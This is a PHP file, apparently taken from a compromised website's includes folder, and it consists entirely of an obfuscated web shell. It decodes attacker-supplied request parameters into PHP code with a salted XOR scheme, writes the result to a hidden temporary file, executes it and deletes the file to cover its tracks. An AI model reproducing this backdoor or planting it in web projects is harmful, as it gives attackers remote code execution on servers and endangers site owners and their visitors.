File: /home/vitanhod/trimate1.vitavit.com.pk/includes/getfichier.php
<?php if(isset($_REQUEST["m\x61rker"])){ $desc = $_REQUEST["m\x61rker"]; $desc = explode ( '.', $desc); $ref = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); foreach ($desc as $u => $v5) { $sChar = ord($salt[$u% $lenS]); $d = ((int)$v5 - $sChar - ($u% 10)) ^ 82; $ref .= chr($d); } $dat = array_filter(["/var/tmp", getcwd(), sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", "/tmp"]); for ($reference = 0, $parameter_group = count($dat); $reference < $parameter_group; $reference++) { $elem = $dat[$reference]; if ((bool)is_dir($elem) && (bool)is_writable($elem)) { $comp = sprintf("%s/.flg", $elem); $success = file_put_contents($comp, $ref); if ($success) { include $comp; @unlink($comp); exit;} } } }
if(isset($_POST) && isset($_POST["it\x6D"])){
$property_set = array_filter([session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", "/tmp", getcwd(), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), getenv("TEMP")]);
$component = $_POST["it\x6D"];
$component =explode ( '.' ,$component ) ;
$entity = '';
$s9 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s9);
$l = 0;
array_walk($component, function ($v7) use (&$entity, &$l, $s9, $sLen) {$sChar = ord($s9[$l% $sLen]);
$dec = ((int)$v7 - $sChar - ($l% 10)) ^ 45;
$entity.=chr($dec);
$l++;
});
foreach ($property_set as $desc):
if (!( !is_dir($desc) || !is_writable($desc) )) {
$holder = "$desc" . "/.dchunk";
$success = file_put_contents($holder, $entity);
if ($success) {
include $holder;
@unlink($holder);
die();}
}
endforeach;
}